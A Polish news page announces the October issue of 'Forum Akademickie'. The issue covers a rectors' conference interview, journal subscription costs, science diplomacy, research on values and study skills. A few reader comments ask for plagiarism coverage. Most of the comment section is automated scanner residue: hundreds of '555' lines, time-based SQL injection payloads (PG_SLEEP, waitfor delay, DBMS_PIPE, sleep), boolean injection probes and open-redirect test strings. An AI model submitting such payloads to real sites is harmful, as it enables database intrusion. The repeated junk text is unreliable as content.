Jak mógłby wyglądać dwustopniowy system ewaluacji, problem korporacyjnych wydawców i możliwe rozwiązania, europejski ekosystem dyplomacji naukowej, psychologia o wartościach, preprinty lekiem na peer review, jak studiować… – to tylko niektóre tematy październikowego numeru „Forum Akademickiego”.
W najnowszym wydaniu FA rozmawiamy z prof. Bogumiłą Kaniewską, przewodniczącą Konferencji Rektorów Akademickich Szkół Polskich. Jej zdaniem konieczne jest wpisanie do ustawy stopniowego wzrostu nakładów na naukę i szkolnictwo wyższe, tak aby w przewidywalnym, w miarę bliskim czasie, dojść do 2% PKB, „choć wymarzonym progiem byłoby 3%, jak w krajach o najwyższym poziomie innowacyjności”. Red. Piotr Kieraciński pyta także m.in. o zadania KRASP na najbliższą kadencję, ewaluację humanistyki, ocenę kształcenia doktorantów, system dyscyplinarny w nauce.
Kilka lat temu Europejskie Stowarzyszenie Uniwersytetów opublikowało raport, z którego wynika, że tylko w 2017 roku 26 państw naszego kontynentu wydało łącznie prawie 600 milionów euro na subskrypcję czasopism naukowych. Aż trzy czwarte tej kwoty trafiło do pięciu gigantów wydawniczych, którymi są Elsevier, Springer Nature, Wiley, Taylor & Francis oraz Amerykańskie Towarzystwo Chemiczne (ACS). Czy obecny system publikacyjny wymaga zmian i w jakim kierunku powinny one zmierzać – o tym w tekście Stanisława Krawczyka z Uniwersytetu Wrocławskiego i Pawła Lenartowicza ze Stowarzyszenia na rzecz Otwartej Nauki.
W kolejnym z cyklu tekstów autorstwa dr Klaudii Mucy-Małek z Uniwersytetu Jagiellońskiego można przyjrzeć się europejskiemu ekosystemowi dyplomacji naukowej.
Otwartość polityki naukowej, umacniana przez praktyki naukowo-dyplomatyczne, ma zostać osiągnięta poprzez promowanie UE jako atrakcyjnego miejsca do prowadzenia badań, włączenie do programów (strumieni) finansowania badań krajów innych niż europejskie, promowanie i praktykowanie partnerskich działań w obliczu globalnych wyzwań i kryzysów, inicjowanie globalnej współpracy badawczej (np. w związku z problemem chorób zakaźnych lub chorób rzadkich) oraz stopniowe budowanie Globalnej Przestrzeni Badawczej (Global Research Area) jako rozszerzenia ERA poprzez rozwijanie międzynarodowego partnerstwa naukowego. Dyplomacja naukowa została przedstawiona w omawianym kontekście jako nieodzowny element unijnych działań zmierzających do rozszerzenia zakresu współpracy międzynarodowej i wzmocnienia pozycji UE na globalnej arenie naukowej i politycznej.
Jak badać świat wartości? Jakich narzędzi używa się do tych celów? Jaka jest struktura wartości społeczeństwa polskiego? Jaką rolę w ukształtowaniu świata wartości mają religia i tradycja, a jaką wzorce i postawy czerpane z otaczającej rzeczywistości? W którą stronę zmierzają przemiany wartości w Polsce i na świecie? Czy nauka powinna oceniać strukturę wartości w danych społeczeństwach i z jakich pozycji? Odpowiedzi na te pytania szukają dr Beata Łubianka z Uniwersytetu Jana Kochanowskiego w Kielcach i dr Joanna Świderska z Akademii Pedagogiki Specjalnej im. Marii Grzegorzewskiej w Warszawie.
O rozwijaniu umiejętności akademickich pisze z kolei dr hab. Anna Wach z Uniwersytetu Ekonomicznego w Poznaniu.
Studiowanie wymaga nie tylko większej samodzielności i odpowiedzialności, ale także poszukiwania i podejmowania wielu aktywności nieobjętych planem studiów. To czas jeszcze większego rozwoju zainteresowań, poszukiwania innych możliwości inwestowania w siebie oraz nabywania nowych kompetencji, np. w kołach naukowych, organizacjach studenckich i działalności pozauczelnianej. Okres studiowania to gromadzenie różnych doświadczeń oraz budowanie własnego kapitału intelektualnego i społecznego, co w rezultacie pozwoli absolwentom uczelni dobrze przygotować się do wejścia na rynek pracy.
Ponadto w numerze m.in.:
Więcej w październikowym numerze „Forum Akademickiego”, który jest już dostępny na naszej stronie internetowej. Zachęcamy także do prenumeraty pisma – zarówno w wersji drukowanej, jak i elektronicznej.
MK, fig
Dawać newsy o plagiatach. Polska nauka zbudowana na wyzysku młodych naiwnych doktorantów i na plagiatach. Ja chcę czytać marka Wrońskiego artykuły. Gdzie są plagiaty??
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@nOOEp
555'"
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555U59WbDML')) OR 208=(SELECT 208 FROM PG_SLEEP(15))--
555ybICYF5G') OR 848=(SELECT 848 FROM PG_SLEEP(15))--
555R4ClMn2w' OR 98=(SELECT 98 FROM PG_SLEEP(15))--
555-1)) OR 351=(SELECT 351 FROM PG_SLEEP(15))--
555-1) OR 453=(SELECT 453 FROM PG_SLEEP(15))--
555-1 OR 658=(SELECT 658 FROM PG_SLEEP(15))--
555THb4tkJx'; waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1; waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555*if(now()=sysdate(),sleep(15),0)
-1' OR 2+453-453-1=0+0+0+1 or 'l2sMhEFt'='
-1" OR 2+979-979-1=0+0+0+1 --
-1 OR 2+648-648-1=0+0+0+1 --
-1 OR 2+805-805-1=0+0+0+1
-1' OR 2+946-946-1=0+0+0+1 --
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@CM1Lk
555'"
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555Vi2cA8cH')) OR 898=(SELECT 898 FROM PG_SLEEP(15))--
555YFTzrABG') OR 636=(SELECT 636 FROM PG_SLEEP(15))--
555NDriFlBM' OR 201=(SELECT 201 FROM PG_SLEEP(15))--
555-1)) OR 549=(SELECT 549 FROM PG_SLEEP(15))--
555-1) OR 814=(SELECT 814 FROM PG_SLEEP(15))--
555-1 OR 787=(SELECT 787 FROM PG_SLEEP(15))--
5552TaU47lf'; waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1; waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555*if(now()=sysdate(),sleep(15),0)
-1" OR 2+548-548-1=0+0+0+1 --
-1' OR 2+911-911-1=0+0+0+1 --
-1' OR 2+633-633-1=0+0+0+1 or '0evYqpVu'='
-1 OR 2+255-255-1=0+0+0+1
555
-1 OR 2+367-367-1=0+0+0+1 --
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
forumakademickie.pl
https://redirtest.acx/
https://forumakademickie.pl/
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
https://forumakademickie.pl/
https://redirtest.acx/
forumakademickie.pl
redirtest.acx
555
555
555
555
ZNOW NUDA . REDAKCJA NIC NIE MA ISTOTNEGO DO ZAOFEROWANIA. JA CZEKAM NA ARTYKULY DOTYCZACE PLAGIATÓW I NIERZETELNOSCI W SZKOLACH WYZSZYCH, to tylko jest ciekawe !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
@@HlEj9
555'"
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
5554pHEzcPN')) OR 820=(SELECT 820 FROM PG_SLEEP(15))--
5556pB4n4we') OR 953=(SELECT 953 FROM PG_SLEEP(15))--
555WOkX6HXb' OR 730=(SELECT 730 FROM PG_SLEEP(15))--
555-1)) OR 512=(SELECT 512 FROM PG_SLEEP(15))--
555-1) OR 913=(SELECT 913 FROM PG_SLEEP(15))--
555-1 OR 773=(SELECT 773 FROM PG_SLEEP(15))--